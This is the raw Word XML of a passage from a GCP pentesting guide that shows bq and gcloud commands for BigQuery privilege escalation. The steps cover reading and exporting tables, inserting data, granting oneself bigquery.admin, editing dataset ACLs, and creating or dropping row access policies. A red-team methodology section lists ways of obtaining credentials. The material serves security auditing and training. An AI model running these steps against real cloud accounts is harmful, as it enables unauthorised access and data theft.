    </w:p>
    <w:p w14:paraId="0B08451B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Reading the information stored inside </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>the a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BigQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> table it might be possible to find s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ensitive information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. To access the info the permission needed is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>bigquery.tables.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>bigquery.jobs.create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>bigquery.tables.getData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14:paraId="574FD71A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2CFBE66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head &lt;dataset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table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C39F3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query --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nouse_legacy_sql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'SELECT * FROM `&lt;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dataset&gt;.&lt;table-name&gt;` LIMIT 1000'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C0D77B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Export data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661747DF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is another way to access the data.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Export it to a cloud storage bucket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and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download the files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the information. To perform this action the following permissions are needed: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>bigquery.tables</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>.export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Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>bigquery.jobs.create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>storage.objects.create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262D2D13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2E26FD6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extract &lt;dataset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table&gt;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://&lt;bucket&gt;/table*.csv" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D54266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 xml:space="preserve">Insert </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="186109F1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might be possible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introduce certain trusted data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Bigquery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> table to abuse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vulnerability in some other place.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> This can be easily done with the permissions </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>bigquery.tables.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>bigquery.tables.updateData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>bigquery.jobs.create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14:paraId="5DC70F95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38ADA75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Via query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F970C5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query --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nouse_legacy_sql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'INSERT INTO `&lt;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dataset&gt;.&lt;table-name&gt;` (rank,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refresh_date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,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dma_name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,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dma_id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, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1468304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C11C1D3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Via insert param</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5045C34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insert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dataset.table</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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tmp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mydata.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F612594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bigquery.datasets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.setIamPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6CEB6DBD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An attacker could abuse this privilege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give himself further permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> over a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>BigQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> dataset:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDDD6BC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3F83B38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For this you also need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bigquery.tables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.getIamPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A8A211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add-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-policy-binding \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60248FA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--member='user:&lt;email&gt;' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A6DB44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--role='roles/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bigquery.admin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' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D36C05C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&gt;:&lt;dataset&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587E384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D40DD3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use the set-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-policy if you don't have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bigquery.tables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.getIamPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C74863D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bigquery.datasets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.update</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>, (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bigquery.datasets.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4EAF98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Just this permission allows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update your access over a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BigQuery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dataset by modifying the ACLs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> that indicate who can access it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB34777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2EC973A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Download current permissions,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reqires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bigquery.datasets.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0165A156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show --format=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prettyjson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&gt;:&lt;dataset&gt; &gt;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acl.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="32EB1C69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Give permissions to the desired user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ADBC85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update --source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acl.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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&gt;:&lt;dataset&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2425E72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Read it with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D21F1DD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head $PROJECT_ID:&lt;dataset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table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A48906F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bigquery.tables</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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.setIamPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CD9FAC5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An attacker could abuse this privilege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give himself further permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> over a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>BigQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61762890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CFF03B8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For this you also need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bigquery.tables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.setIamPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E3E506F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add-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-policy-binding \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A07AB5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--member='user:&lt;email&gt;' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5290371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--role='roles/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bigquery.admin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' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019D3B54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&gt;:&lt;dataset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table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F9C92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4A79E04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use the set-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iam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-policy if you don't have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bigquery.tables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.setIamPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D65B62F" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C26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proofErr w:type="gram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lastRenderedPageBreak/>
        <w:t>bigquery.rowAccessPolicies.update</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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bigquery.rowAccessPolicies.setIamPolicy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bigquery.tables.getData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Style w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsiaTheme="majorEastAsia" w:hAnsi="var(--font-mono)"/>
          <w:spacing w:val="-3"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>bigquery.jobs.create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="420B3082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According to the docs, with the mention permissions it's possible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update a row policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> However,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using the cli </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>bq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> you need some more: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>bigquery.rowAccessPolicies.create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Style w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>bigquery.tables.get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4250BE06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2E96BB01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query --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nouse_legacy_sql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'CREATE OR REPLACE ROW ACCESS POLICY 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filter_id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 ON `&lt;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dataset-name&gt;.&lt;table-name&gt;` GRANT TO ("&lt;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user:user@email.xyz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&gt;") FILTER USING (term =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Cfba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");' # A example filter was used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6790F27F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It's possible to find the filter ID in the output of the row policies enumeration. Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB3E9DF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71FF3E5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ls --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row_access_policies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&gt;:&lt;dataset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table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDC508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</w:p>
    <w:p w14:paraId="020A8864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Id        Filter Predicate            Grantees              Creation Time    Last Modified Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691F1807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------------- ------------------ ----------------------------- ----------------- --------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E9AB1F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apac_filter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term =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Cfba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"     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user:asd@hacktricks.xyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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21 Jan 23:32:09   21 Jan 23:32:09</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6756A84A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have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>bigquery.rowAccessPolicies.delete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instead of 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bigquery.rowAccessPolicies.update</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> you could also just delete the policy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02830B88" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C266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785E226A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Remove one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5B3DB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query --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nouse_legacy_sql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'DROP ALL ROW ACCESS POLICY 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policy_id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 ON `&lt;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dataset-name&gt;.&lt;table-name&gt;`;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5A5930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E1C4E85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Remove all (if it's the last row policy you need to use this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFD141E" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C266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bq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query --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nouse_legacy_sql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'DROP ALL ROW ACCESS POLICIES ON `&lt;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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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&gt;.&lt;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dataset-name&gt;.&lt;table-name&gt;`;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF98789" w14:textId="77777777" w:rsidR="007C2669" w:rsidRDefault="007C2669" w:rsidP="007C2669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Another potential option to bypass row access policies would be to just change the value of the restricted data. If you can only see when </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>term</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> is 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Cfba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, just modify all the records of the table to have </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>term = "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Cfba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>"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sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>However</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> this is prevented by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>bigquery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50D39CD8" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
    <w:p w14:paraId="5110CFCF" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="7F84FFA0" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="05537144" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="71275821" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="43E51ECB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Labs to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>learn</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="47DB2418" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50A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94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https://gcpgoat.joshuajebaraj.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D047819" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50A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95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https://github.com/ine-labs/GCPGoat</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F802694" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50A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96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https://github.com/lacioffi/GCP-pentest-lab/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2254F141" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50A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97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https://github.com/carlospolop/gcp_privesc_scripts</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0593BC76" w14:textId="77777777" w:rsidR="00816078" w:rsidRDefault="00816078" w:rsidP="0081607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2C04B3F7" w14:textId="77777777" w:rsidR="00816078" w:rsidRDefault="00816078" w:rsidP="0081607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7519C6E9" w14:textId="77777777" w:rsidR="00816078" w:rsidRDefault="00816078" w:rsidP="0081607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</w:p>
    <w:p w14:paraId="2FB81D43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 xml:space="preserve">GCP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Pentester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk171301138"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Red Team Methodology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4547543A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order to audit a GCP environment it's very important to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>know:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> which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services are being used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, what is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being exposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, who has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access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to what, and how are internal GCP services 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external services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> connected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C771A72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From a Red Team point of view,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first step to compromise a GCP environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> is to manage to obtain some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credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>. Here you have some ideas on how to do that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603E7E66" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Leaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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(or similar) - OSINT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5883F9FA" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Social</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> Engineering (Check the page </w:t>
      </w:r>
      <w:hyperlink r:id="rId98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Workspace Security</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A19CD60" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Password</w:t>
